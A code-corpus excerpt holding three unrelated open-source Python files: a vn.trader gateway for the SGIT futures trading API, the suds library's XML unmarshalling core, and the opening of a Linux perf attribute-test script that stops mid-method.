3. 撤单的确认,通过onRspOrderAction通知
为了获取实时的委托状态,需要用户自行把这三个数据合并起来,
因此在TdApi中维护了一个委托数据的缓存字典,对vn.trader系统中推送的是本地委托号,
在Gateway中和委托系统号对应起来
飞鼠的撤单需要使用:交易所代码+交易所的系统委托号,撤单时从缓存中
获取委托的系统编号
'''
import os
import json
from vnsgitmd import MdApi
from vnsgittd import TdApi
from sgitDataType import *
from vtGateway import *
# 以下为一些VT类型和SGIT类型的映射字典
# 价格类型映射
priceTypeMap = {}
priceTypeMap[PRICETYPE_LIMITPRICE] = defineDict["Sgit_FTDC_OPT_LimitPrice"]
priceTypeMap[PRICETYPE_MARKETPRICE] = defineDict["Sgit_FTDC_OPT_AnyPrice"]
priceTypeMapReverse = {v: k for k, v in priceTypeMap.items()}
# 方向类型映射
directionMap = {}
directionMap[DIRECTION_LONG] = defineDict['Sgit_FTDC_D_Buy']
directionMap[DIRECTION_SHORT] = defineDict['Sgit_FTDC_D_Sell']
directionMapReverse = {v: k for k, v in directionMap.items()}
# 开平类型映射
offsetMap = {}
offsetMap[OFFSET_OPEN] = defineDict['Sgit_FTDC_OF_Open']
offsetMap[OFFSET_CLOSE] = defineDict['Sgit_FTDC_OF_Close']
offsetMap[OFFSET_CLOSETODAY] = defineDict['Sgit_FTDC_OF_CloseToday']
offsetMap[OFFSET_CLOSEYESTERDAY] = defineDict['Sgit_FTDC_OF_CloseYesterday']
offsetMapReverse = {v:k for k,v in offsetMap.items()}
# 交易所类型映射
exchangeMap = {}
exchangeMap[EXCHANGE_CFFEX] = defineDict['Sgit_FTDC_EIDT_CFFEX']
exchangeMap[EXCHANGE_SHFE] = defineDict['Sgit_FTDC_EIDT_SHFE']
exchangeMap[EXCHANGE_CZCE] = defineDict['Sgit_FTDC_EIDT_CZCE']
exchangeMap[EXCHANGE_DCE] = defineDict['Sgit_FTDC_EIDT_DCE']
exchangeMap[EXCHANGE_SGE] = defineDict['Sgit_FTDC_EIDT_GOLD']
exchangeMap[EXCHANGE_UNKNOWN] = ''
exchangeMapReverse = {v:k for k,v in exchangeMap.items()}
# 持仓类型映射
posiDirectionMap = {}
posiDirectionMap[DIRECTION_NET] = defineDict["Sgit_FTDC_PD_Net"]
posiDirectionMap[DIRECTION_LONG] = defineDict["Sgit_FTDC_PD_Long"]
posiDirectionMap[DIRECTION_SHORT] = defineDict["Sgit_FTDC_PD_Short"]
posiDirectionMapReverse = {v:k for k,v in posiDirectionMap.items()}
# 委托状态类型映射
orderStatusMap = {}
orderStatusMap[STATUS_ALLTRADED] = defineDict["Sgit_FTDC_OST_AllTraded"]
orderStatusMap[STATUS_PARTTRADED] = defineDict["Sgit_FTDC_OST_PartTradedQueueing"]
orderStatusMap[STATUS_NOTTRADED] = defineDict["Sgit_FTDC_OST_NoTradeQueueing"]
orderStatusMap[STATUS_CANCELLED] = defineDict["Sgit_FTDC_OST_Canceled"]
orderStatusMapReverse = {v:k for k,v in orderStatusMap.items()}
########################################################################
class SgitGateway(VtGateway):
"""SGIT接口"""
#----------------------------------------------------------------------
def __init__(self, eventEngine, gatewayName='SGIT'):
"""Constructor"""
super(SgitGateway, self).__init__(eventEngine, gatewayName)
self.mdApi = SgitMdApi(self) # 行情API
self.tdApi = SgitTdApi(self) # 交易API
self.mdConnected = False # 行情API连接状态,登录完成后为True
self.tdConnected = False # 交易API连接状态
self.qryEnabled = False # 是否要启动循环查询
#----------------------------------------------------------------------
def connect(self):
"""连接"""
# 载入json文件
fileName = self.gatewayName + '_connect.json'
path = os.path.abspath(os.path.dirname(__file__))
fileName = os.path.join(path, fileName)
try:
f = file(fileName)
except IOError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'读取连接配置出错,请检查'
self.onLog(log)
return
# 解析json文件
setting = json.load(f)
try:
userID = str(setting['userID'])
password = str(setting['password'])
brokerID = str(setting['brokerID'])
tdAddress = str(setting['tdAddress'])
mdAddress = str(setting['mdAddress'])
except KeyError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'连接配置缺少字段,请检查'
self.onLog(log)
return
# 创建行情和交易接口对象
self.mdApi.connect(userID, password, brokerID, mdAddress)
self.tdApi.connect(userID, password, brokerID, tdAddress)
# 初始化并启动查询
self.initQuery()
#----------------------------------------------------------------------
def subscribe(self, subscribeReq):
"""订阅行情"""
self.mdApi.subscribe(subscribeReq)
#----------------------------------------------------------------------
def sendOrder(self, orderReq):
"""发单"""
return self.tdApi.sendOrder(orderReq)
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq):
"""撤单"""
self.tdApi.cancelOrder(cancelOrderReq)
#----------------------------------------------------------------------
def qryAccount(self):
"""查询账户资金"""
self.tdApi.qryAccount()
#----------------------------------------------------------------------
def qryPosition(self):
"""查询持仓"""
self.tdApi.qryPosition()
#----------------------------------------------------------------------
def close(self):
"""关闭"""
if self.mdConnected:
self.mdApi.close()
if self.tdConnected:
self.tdApi.close()
#----------------------------------------------------------------------
def initQuery(self):
"""初始化连续查询"""
if self.qryEnabled:
# 需要循环的查询函数列表
# 飞鼠柜台的资金是主动推送的,因此无需查询
self.qryFunctionList = [self.qryPosition]
self.qryCount = 0 # 查询触发倒计时
self.qryTrigger = 2 # 查询触发点
self.qryNextFunction = 0 # 上次运行的查询函数索引
self.startQuery()
#----------------------------------------------------------------------
def query(self, event):
"""注册到事件处理引擎上的查询函数"""
self.qryCount += 1
if self.qryCount > self.qryTrigger:
# 清空倒计时
self.qryCount = 0
# 执行查询函数
function = self.qryFunctionList[self.qryNextFunction]
function()
# 计算下次查询函数的索引,如果超过了列表长度,则重新设为0
self.qryNextFunction += 1
if self.qryNextFunction == len(self.qryFunctionList):
self.qryNextFunction = 0
#----------------------------------------------------------------------
def startQuery(self):
"""启动连续查询"""
self.eventEngine.register(EVENT_TIMER, self.query)
#----------------------------------------------------------------------
def setQryEnabled(self, qryEnabled):
"""设置是否要启动循环查询"""
self.qryEnabled = qryEnabled
########################################################################
class SgitMdApi(MdApi):
"""SGIT行情API实现"""
#----------------------------------------------------------------------
def __init__(self, gateway):
"""Constructor"""
super(SgitMdApi, self).__init__()
self.gateway = gateway # gateway对象
self.gatewayName = gateway.gatewayName # gateway对象名称
self.reqID = EMPTY_INT # 操作请求编号
self.connectionStatus = False # 连接状态
self.loginStatus = False # 登录状态
self.subscribedSymbols = set() # 已订阅合约代码
self.userID = EMPTY_STRING # 账号
self.password = EMPTY_STRING # 密码
self.brokerID = EMPTY_STRING # 经纪商代码
self.address = EMPTY_STRING # 服务器地址
#----------------------------------------------------------------------
def connect(self, userID, password, brokerID, address):
"""初始化连接"""
self.userID = userID # 账号
self.password = password # 密码
self.brokerID = brokerID # 经纪商代码
self.address = address # 服务器地址
# 如果尚未建立服务器连接,则进行连接
if not self.connectionStatus:
# 创建C++环境中的API对象,这里传入的参数是需要用来保存.con文件的文件夹路径
path = os.getcwd() + '/temp/' + self.gatewayName + '/'
if not os.path.exists(path):
os.makedirs(path)
self.createFtdcMdApi(path)
# 订阅数据流
self.subscribeMarketTopic(0)
# 注册服务器地址
self.registerFront(self.address)
# 初始化连接,成功会调用onFrontConnected
self.init(False)
# 若已经连接但尚未登录,则进行登录
else:
if not self.loginStatus:
self.login()
#----------------------------------------------------------------------
def subscribe(self, subscribeReq):
"""订阅合约"""
# 这里的设计是,如果尚未登录就调用了订阅方法
# 则先保存订阅请求,登录完成后会自动订阅
if self.loginStatus:
self.subQuot({'ContractID': str(subscribeReq.symbol)})
self.subscribedSymbols.add(subscribeReq)
#----------------------------------------------------------------------
def login(self):
"""登录"""
# 如果填入了用户名密码等,则登录
if self.userID and self.password and self.brokerID:
req = {}
req['UserID'] = self.userID
req['Password'] = self.password
req['BrokerID'] = self.brokerID
self.reqID += 1
self.reqUserLogin(req, self.reqID)
#----------------------------------------------------------------------
def close(self):
"""关闭"""
self.exit()
#----------------------------------------------------------------------
def onFrontConnected(self):
"""服务器连接"""
self.connectionStatus = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'行情服务器连接成功'
self.gateway.onLog(log)
self.login()
#----------------------------------------------------------------------
def onFrontDisconnected(self, msg):
"""服务器断开"""
self.connectionStatus = False
self.loginStatus = False
self.gateway.mdConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'行情服务器连接断开'
self.gateway.onLog(log)
#----------------------------------------------------------------------
def onRspUserLogin(self, data, error, i, last):
"""登陆回报"""
# 如果登录成功,推送日志信息
if error['ErrorID'] == 0:
self.loginStatus = True
self.gateway.mdConnected = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'行情服务器登录完成'
self.gateway.onLog(log)
# 调用ready
self.ready()
# 重新订阅之前订阅的合约
for subscribeReq in self.subscribedSymbols:
self.subscribe(subscribeReq)
# 否则,推送错误信息
else:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspUserLogout(self, data, error, i, last):
"""登出回报"""
# 如果登出成功,推送日志信息
if error['ErrorID'] == 0:
self.loginStatus = False
self.gateway.tdConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器登出完成'
self.gateway.onLog(log)
# 否则,推送错误信息
else:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRtnDepthMarketData(self, data):
"""行情推送"""
tick = VtTickData()
tick.gatewayName = self.gatewayName
tick.symbol = data['InstrumentID']
tick.exchange = exchangeMapReverse.get(data['ExchangeID'], u'未知')
tick.vtSymbol = tick.symbol #'.'.join([tick.symbol, EXCHANGE_UNKNOWN])
tick.lastPrice = data['LastPrice']
tick.volume = data['Volume']
tick.openInterest = data['OpenInterest']
tick.time = '.'.join([data['UpdateTime'], str(data['UpdateMillisec']/100)])
tick.date = data['TradingDay']
tick.openPrice = data['OpenPrice']
tick.highPrice = data['HighestPrice']
tick.lowPrice = data['LowestPrice']
tick.preClosePrice = data['PreClosePrice']
tick.upperLimit = data['UpperLimitPrice']
tick.lowerLimit = data['LowerLimitPrice']
# SGIT只有一档行情
tick.bidPrice1 = data['BidPrice1']
tick.bidVolume1 = data['BidVolume1']
tick.askPrice1 = data['AskPrice1']
tick.askVolume1 = data['AskVolume1']
tick.bidPrice2 = data['BidPrice2']
tick.bidVolume2 = data['BidVolume2']
tick.askPrice2 = data['AskPrice2']
tick.askVolume2 = data['AskVolume2']
tick.bidPrice3 = data['BidPrice3']
tick.bidVolume3 = data['BidVolume3']
tick.askPrice3 = data['AskPrice3']
tick.askVolume3 = data['AskVolume3']
tick.bidPrice4 = data['BidPrice4']
tick.bidVolume4 = data['BidVolume4']
tick.askPrice4 = data['AskPrice4']
tick.askVolume4 = data['AskVolume4']
tick.bidPrice5 = data['BidPrice5']
tick.bidVolume5 = data['BidVolume5']
tick.askPrice5 = data['AskPrice5']
tick.askVolume5 = data['AskVolume5']
self.gateway.onTick(tick)
########################################################################
class SgitTdApi(TdApi):
"""SGIT交易API实现"""
#----------------------------------------------------------------------
def __init__(self, gateway):
"""API对象的初始化函数"""
super(SgitTdApi, self).__init__()
self.gateway = gateway # gateway对象
self.gatewayName = gateway.gatewayName # gateway对象名称
self.reqID = EMPTY_INT # 操作请求编号
self.orderRef = EMPTY_INT # 订单编号
self.connectionStatus = False # 连接状态
self.loginStatus = False # 登录状态
self.userID = EMPTY_STRING # 账号
self.password = EMPTY_STRING # 密码
self.brokerID = EMPTY_STRING # 经纪商代码
self.address = EMPTY_STRING # 服务器地址
self.investorID = EMPTY_STRING # 投资者代码
self.frontID = EMPTY_INT # 前置机编号
self.sessionID = EMPTY_INT # 会话编号
self.localID = 0 # 本地委托代码
self.orderDict = {} # 缓存委托对象的字典
self.localSysDict = {} # key为本地委托代码,value为交易所系统代码
self.cancelReqDict = {} # key为本地委托代码,value为撤单请求
#----------------------------------------------------------------------
def connect(self, userID, password, brokerID, address):
"""初始化连接"""
self.userID = userID # 账号
self.password = password # 密码
self.brokerID = brokerID # 经纪商代码
self.address = address # 服务器地址
# 如果尚未建立服务器连接,则进行连接
if not self.connectionStatus:
# 创建C++环境中的API对象,这里传入的参数是需要用来保存.con文件的文件夹路径
path = os.getcwd() + '/temp/' + self.gatewayName + '/'
if not os.path.exists(path):
os.makedirs(path)
self.createFtdcTraderApi(path)
# 订阅数据流
self.subscribePrivateTopic(0)
self.subscribePublicTopic(0)
# 注册服务器地址
self.registerFront(self.address)
# 初始化连接,成功会调用onFrontConnected
self.init(False)
# 若已经连接但尚未登录,则进行登录
else:
if not self.loginStatus:
self.login()
#----------------------------------------------------------------------
def login(self):
"""连接服务器"""
# 如果填入了用户名密码等,则登录
if self.userID and self.password and self.brokerID:
req = {}
req['UserID'] = self.userID
req['Password'] = self.password
req['BrokerID'] = self.brokerID
self.reqID += 1
self.reqUserLogin(req, self.reqID)
#----------------------------------------------------------------------
def qryAccount(self):
"""查询账户"""
self.reqID += 1
self.reqQryTradingAccount({}, self.reqID)
#----------------------------------------------------------------------
def qryPosition(self):
"""查询持仓"""
self.reqID += 1
req = {}
req['BrokerID'] = self.brokerID
req['InvestorID'] = self.userID
self.reqQryInvestorPosition(req, self.reqID)
#----------------------------------------------------------------------
def sendOrder(self, orderReq):
"""发单"""
self.reqID += 1
self.localID += 1
strID = str(self.localID).rjust(12, '0')
req = {}
req['InstrumentID'] = orderReq.symbol
req['LimitPrice'] = orderReq.price
req['VolumeTotalOriginal'] = orderReq.volume
# 下面如果由于传入的类型本接口不支持,则会返回空字符串
try:
req['OrderPriceType'] = priceTypeMap[orderReq.priceType]
req['Direction'] = directionMap[orderReq.direction]
req['CombOffsetFlag'] = offsetMap[orderReq.offset]
except KeyError:
return ''
req['OrderRef'] = strID
req['InvestorID'] = self.investorID
req['UserID'] = self.userID
req['BrokerID'] = self.brokerID
req['CombHedgeFlag'] = defineDict['Sgit_FTDC_HF_Speculation'] # 投机单
req['ContingentCondition'] = defineDict['Sgit_FTDC_CC_Immediately'] # 立即发单
req['ForceCloseReason'] = defineDict['Sgit_FTDC_FCC_NotForceClose'] # 非强平
req['IsAutoSuspend'] = 0 # 非自动挂起
req['TimeCondition'] = defineDict['Sgit_FTDC_TC_GFD'] # 今日有效
req['VolumeCondition'] = defineDict['Sgit_FTDC_VC_AV'] # 任意成交量
req['MinVolume'] = 1 # 最小成交量为1
self.reqOrderInsert(req, self.reqID)
# 返回订单号(字符串),便于某些算法进行动态管理
vtOrderID = '.'.join([self.gatewayName, strID])
return vtOrderID
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq):
"""撤单"""
# 如果OrderSysID的数据尚未返回,则把撤单请求缓存下来后直接返回
# 若已经返回,则获取strID对应的OrderSysID,并撤单
strID = cancelOrderReq.orderID
if strID not in self.localSysDict:
self.cancelReqDict[strID] = cancelOrderReq
return
sysID = self.localSysDict[strID]
self.reqID += 1
req = {}
req['InstrumentID'] = cancelOrderReq.symbol
req['ExchangeID'] = exchangeMap[cancelOrderReq.exchange]
req['OrderSysID'] = sysID
req['ActionFlag'] = defineDict['Sgit_FTDC_AF_Delete']
req['BrokerID'] = self.brokerID
req['InvestorID'] = self.userID
req['UserID'] = self.userID
self.reqOrderAction(req, self.reqID)
#----------------------------------------------------------------------
def close(self):
"""关闭"""
self.exit()
#----------------------------------------------------------------------
def onFrontConnected(self):
"""服务器连接"""
self.connectionStatus = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器连接成功'
self.gateway.onLog(log)
self.login()
#----------------------------------------------------------------------
def onFrontDisconnected(self, msg):
"""服务器断开"""
self.connectionStatus = False
self.loginStatus = False
self.gateway.mdConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器连接断开'
self.gateway.onLog(log)
#----------------------------------------------------------------------
def onRspUserLogin(self, data, error, n, last):
'''登陆回报'''
# 如果登录成功,推送日志信息
if error['ErrorID'] == 0:
self.loginStatus = True
self.gateway.mdConnected = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器登录完成'
self.gateway.onLog(log)
# 调用ready
self.ready()
# 查询投资者代码
self.reqID += 1
self.reqQryInvestor({}, self.reqID)
# 否则,推送错误信息
else:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspUserLogout(self, data, error, n, last):
"""登出回报"""
# 如果登出成功,推送日志信息
if error['ErrorID'] == 0:
self.loginStatus = False
self.gateway.tdConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器登出完成'
self.gateway.onLog(log)
# 否则,推送错误信息
else:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspUserPasswordUpdate(self, data, error, n, last):
""""""
pass
#----------------------------------------------------------------------
def onRspOrderInsert(self, data, error, n, last):
"""发单错误(柜台)"""
if error['ErrorID'] != 0:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspOrderAction(self, data, error, n, last):
"""撤单错误(柜台)"""
# 获取委托对象
sysID = data['OrderSysID']
strID = data['OrderRef']
if sysID in self.orderDict:
order = self.orderDict[sysID]
else:
self.localSysDict[strID] = sysID
order = VtOrderData()
self.orderDict[sysID] = order
order.gatewayName = self.gatewayName
order.orderID = strID
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
# 推送错误信息
if error['ErrorID'] != 0:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
else:
order.status = STATUS_CANCELLED
self.gateway.onOrder(order)
#----------------------------------------------------------------------
def onRspQryOrder(self, data, error, n, last):
""""""
pass
#----------------------------------------------------------------------
def onRspQryTradingAccount(self, data, error, n, last):
"""资金账户查询回报"""
account = VtAccountData()
account.gatewayName = self.gatewayName
# 账户代码
account.accountID = data['AccountID']
account.vtAccountID = '.'.join([self.gatewayName, account.accountID])
# 数值相关
account.preBalance = data['PreBalance']
account.available = data['Available']
account.commission = data['Commission']
account.margin = data['CurrMargin']
account.closeProfit = data['CloseProfit']
account.positionProfit = data['PositionProfit']
# 这里的balance和快期中的账户不确定是否一样,需要测试
account.balance = (data['PreBalance'] - data['PreCredit'] - data['PreMortgage'] +
data['Mortgage'] - data['Withdraw'] + data['Deposit'] +
data['CloseProfit'] + data['PositionProfit'] + data['CashIn'] -
data['Commission'])
# 推送
self.gateway.onAccount(account)
#----------------------------------------------------------------------
def onRspQryInvestor(self, data, error, n, last):
""""""
self.investorID = data['InvestorID']
if last:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'投资者编码获取完成'
self.gateway.onLog(log)
# 查询合约
self.reqID += 1
self.reqQryInstrument({}, self.reqID)
#----------------------------------------------------------------------
def onRspQryInstrument(self, data, error, n, last):
"""合约查询回报"""
contract = VtContractData()
contract.gatewayName = self.gatewayName
contract.symbol = data['InstrumentID']
contract.exchange = exchangeMapReverse[data['ExchangeID']]
contract.vtSymbol = contract.symbol #'.'.join([contract.symbol, contract.exchange])
contract.name = data['InstrumentName'].decode('GBK')
# 合约数值
contract.size = data['VolumeMultiple']
contract.priceTick = data['PriceTick']
# 合约类型
if contract.exchange == EXCHANGE_SGE:
if '(' in contract.symbol:
contract.productClass = PRODUCT_DEFER
else:
contract.productClass = PRODUCT_SPOT
else:
contract.productClass = PRODUCT_FUTURES
# 推送
self.gateway.onContract(contract)
if last:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易合约信息获取完成'
self.gateway.onLog(log)
#----------------------------------------------------------------------
def onRtnOrder(self, data, error):
"""报单回报"""
# 获取委托对象
sysID = data['OrderSysID']
strID = data['OrderRef']
newID = int(strID)
if newID > self.localID:
self.localID = newID
if sysID in self.orderDict:
order = self.orderDict[sysID]
else:
self.localSysDict[strID] = sysID
order = VtOrderData()
self.orderDict[sysID] = order
order.gatewayName = self.gatewayName
order.orderID = strID
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.symbol = data['InstrumentID']
order.exchange = exchangeMapReverse[data['ExchangeID']]
order.vtSymbol = order.symbol
order.direction = directionMapReverse.get(data['Direction'], DIRECTION_UNKNOWN)
order.offset = offsetMapReverse.get(data['CombOffsetFlag'], OFFSET_UNKNOWN)
order.totalVolume = data['VolumeTotalOriginal']
order.price = data['LimitPrice']
# 推送错误信息
if error['ErrorID'] == 0:
# 如果没有错误信息,则认为委托有效未成交
if not order.status:
order.status = STATUS_NOTTRADED
else:
# 如果有错误信息,委托被自动撤单
order.status = STATUS_CANCELLED
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
# 推送
self.gateway.onOrder(order)
# 检查是否有待撤单请求
if strID in self.cancelReqDict:
req = self.cancelReqDict.pop(strID)
self.cancelOrder(req)
#----------------------------------------------------------------------
def onRtnTrade(self, data):
"""成交回报"""
# 更新委托
sysID = data['OrderSysID']
strID = data['OrderRef']
if sysID in self.orderDict:
order = self.orderDict[sysID]
else:
self.localSysDict[strID] = sysID
order = VtOrderData()
self.orderDict[sysID] = order
order.gatewayName = self.gatewayName
order.orderID = strID
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.tradedVolume += data['Volume']
if order.tradedVolume == order.totalVolume:
order.status = STATUS_ALLTRADED
else:
order.status = STATUS_PARTTRADED
# 更新成交
trade = VtTradeData()
trade.gatewayName = self.gatewayName
trade.symbol = data['InstrumentID']
trade.exchange = exchangeMapReverse[data['ExchangeID']]
trade.vtSymbol = trade.symbol
trade.tradeID = data['TradeID']
trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID])
trade.orderID = order.orderID
trade.vtOrderID = '.'.join([self.gatewayName, trade.orderID])
# 方向
trade.direction = directionMapReverse.get(data['Direction'], '')
# 开平
trade.offset = offsetMapReverse.get(data['OffsetFlag'], '')
# 价格、报单量等数值
trade.price = data['Price']
trade.volume = data['Volume']
trade.tradeTime = data['TradeTime']
# 推送
self.gateway.onTrade(trade)
self.gateway.onOrder(order)
#----------------------------------------------------------------------
def onRtnInstrumentStatus(self, data):
""""""
pass
#----------------------------------------------------------------------
def onRspQryInvestorPositionDetail(self, data, error, n, last):
""""""
pass
#----------------------------------------------------------------------
def onRspQryInvestorPosition(self, data, error, n, last):
"""持仓查询回报"""
# 过滤空数据的情况
if not data['InstrumentID']:
return
pos = VtPositionData()
pos.gatewayName = self.gatewayName
# 保存代码
pos.symbol = data['InstrumentID']
pos.vtSymbol = pos.symbol # 这里因为data中没有ExchangeID这个字段
# 方向和持仓冻结数量
pos.direction = posiDirectionMapReverse.get(data['PosiDirection'], '')
if pos.direction == DIRECTION_NET or pos.direction == DIRECTION_LONG:
pos.frozen = data['LongFrozen']
elif pos.direction == DIRECTION_SHORT:
pos.frozen = data['ShortFrozen']
# 持仓量
pos.position = data['TodayPosition']
pos.ydPosition = data['YdPosition']
# 持仓均价
if pos.position:
pos.price = data['PositionCost'] / pos.position
# VT系统持仓名
pos.vtPositionName = '.'.join([pos.vtSymbol, pos.direction])
# 推送
self.gateway.onPosition(pos)
#----------------------------------------------------------------------
def print_dict(d):
""""""
l = d.keys()
l.sort()
for k in l:
print k, ':', d[k]
| mit |
multikatt/CouchPotatoServer | libs/suds/umx/core.py | 199 | 7575 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
"""
Provides base classes for XML->object I{unmarshalling}.
"""
from logging import getLogger
from suds import *
from suds.umx import *
from suds.umx.attrlist import AttrList
from suds.sax.text import Text
from suds.sudsobject import Factory, merge
log = getLogger(__name__)
reserved = { 'class':'cls', 'def':'dfn', }
class Core:
"""
The abstract XML I{node} unmarshaller. This class provides the
I{core} unmarshalling functionality.
"""
def process(self, content):
"""
Process an object graph representation of the xml I{node}.
@param content: The current content being unmarshalled.
@type content: L{Content}
@return: A suds object.
@rtype: L{Object}
"""
self.reset()
return self.append(content)
def append(self, content):
"""
Process the specified node and convert the XML document into
a I{suds} L{object}.
@param content: The current content being unmarshalled.
@type content: L{Content}
@return: A I{append-result} tuple as: (L{Object}, I{value})
@rtype: I{append-result}
@note: This is not the proper entry point.
@see: L{process()}
"""
self.start(content)
self.append_attributes(content)
self.append_children(content)
self.append_text(content)
self.end(content)
return self.postprocess(content)
def postprocess(self, content):
"""
Perform final processing of the resulting data structure as follows:
- Mixed values (children and text) will have a result of the I{content.node}.
- Simi-simple values (attributes, no-children and text) will have a result of a
property object.
- Simple values (no-attributes, no-children with text nodes) will have a string
result equal to the value of the content.node.getText().
@param content: The current content being unmarshalled.
@type content: L{Content}
@return: The post-processed result.
@rtype: I{any}
"""
node = content.node
if len(node.children) and node.hasText():
return node
attributes = AttrList(node.attributes)
if attributes.rlen() and \
not len(node.children) and \
node.hasText():
p = Factory.property(node.name, node.getText())
return merge(content.data, p)
if len(content.data):
return content.data
lang = attributes.lang()
if content.node.isnil():
return None
if not len(node.children) and content.text is None:
if self.nillable(content):
return None
else:
return Text('', lang=lang)
if isinstance(content.text, basestring):
return Text(content.text, lang=lang)
else:
return content.text
def append_attributes(self, content):
"""
Append attribute nodes into L{Content.data}.
Attributes in the I{schema} or I{xml} namespaces are skipped.
@param content: The current content being unmarshalled.
@type content: L{Content}
"""
attributes = AttrList(content.node.attributes)
for attr in attributes.real():
name = attr.name
value = attr.value
self.append_attribute(name, value, content)
def append_attribute(self, name, value, content):
"""
Append an attribute name/value into L{Content.data}.
@param name: The attribute name
@type name: basestring
@param value: The attribute's value
@type value: basestring
@param content: The current content being unmarshalled.
@type content: L{Content}
"""
key = name
key = '_%s' % reserved.get(key, key)
setattr(content.data, key, value)
def append_children(self, content):
"""
Append child nodes into L{Content.data}
@param content: The current content being unmarshalled.
@type content: L{Content}
"""
for child in content.node:
cont = Content(child)
cval = self.append(cont)
key = reserved.get(child.name, child.name)
if key in content.data:
v = getattr(content.data, key)
if isinstance(v, list):
v.append(cval)
else:
setattr(content.data, key, [v, cval])
continue
if self.unbounded(cont):
if cval is None:
setattr(content.data, key, [])
else:
setattr(content.data, key, [cval,])
else:
setattr(content.data, key, cval)
def append_text(self, content):
"""
Append text nodes into L{Content.data}
@param content: The current content being unmarshalled.
@type content: L{Content}
"""
if content.node.hasText():
content.text = content.node.getText()
def reset(self):
pass
def start(self, content):
"""
Processing on I{node} has started. Build and return
the proper object.
@param content: The current content being unmarshalled.
@type content: L{Content}
@return: A subclass of Object.
@rtype: L{Object}
"""
content.data = Factory.object(content.node.name)
def end(self, content):
"""
Processing on I{node} has ended.
@param content: The current content being unmarshalled.
@type content: L{Content}
"""
pass
def bounded(self, content):
"""
Get whether the content is bounded (not a list).
@param content: The current content being unmarshalled.
@type content: L{Content}
@return: True if bounded, else False
@rtype: boolean
'"""
return ( not self.unbounded(content) )
def unbounded(self, content):
"""
Get whether the object is unbounded (a list).
@param content: The current content being unmarshalled.
@type content: L{Content}
@return: True if unbounded, else False
@rtype: boolean
'"""
return False
def nillable(self, content):
"""
Get whether the object is nillable.
@param content: The current content being unmarshalled.
@type content: L{Content}
@return: True if nillable, else False
@rtype: boolean
'"""
return False | gpl-3.0 |
MISL-EBU-System-SW/lsp-public | tools/perf/tests/attr.py | 1266 | 9424 | #! /usr/bin/python
import os
import sys
import glob
import optparse
import tempfile
import logging
import shutil
import ConfigParser
class Fail(Exception):
def __init__(self, test, msg):
self.msg = msg
self.test = test
def getMsg(self):
return '\'%s\' - %s' % (self.test.path, self.msg)
class Unsup(Exception):
def __init__(self, test):
self.test = test
def getMsg(self):
return '\'%s\'' % self.test.path
class Event(dict):
terms = [
'cpu',
'flags',
'type',
'size',
'config',
'sample_period',
'sample_type',
'read_format',
'disabled',
'inherit',
'pinned',
'exclusive',
'exclude_user',
'exclude_kernel',
'exclude_hv',
'exclude_idle',
'mmap',
'comm',
'freq',
'inherit_stat',
'enable_on_exec',
'task',
'watermark',
'precise_ip',
'mmap_data',
'sample_id_all',
'exclude_host',
'exclude_guest',
'exclude_callchain_kernel',
'exclude_callchain_user',
'wakeup_events',
'bp_type',
'config1',
'config2',
'branch_sample_type',
'sample_regs_user',
'sample_stack_user',
]
def add(self, data):
for key, val in data:
log.debug(" %s = %s" % (key, val))
self[key] = val
def __init__(self, name, data, base):
log.debug(" Event %s" % name);
self.name = name;
self.group = ''
self.add(base)
self.add(data)
def compare_data(self, a, b):
# Allow multiple values in assignment separated by '|'
a_list = a.split('|')
b_list = b.split('|')
for a_item in a_list:
for b_item in b_list:
if (a_item == b_item):
return True
elif (a_item == '*') or (b_item == '*'):
return True
return False
def equal(self, other):
for t in Event.terms:
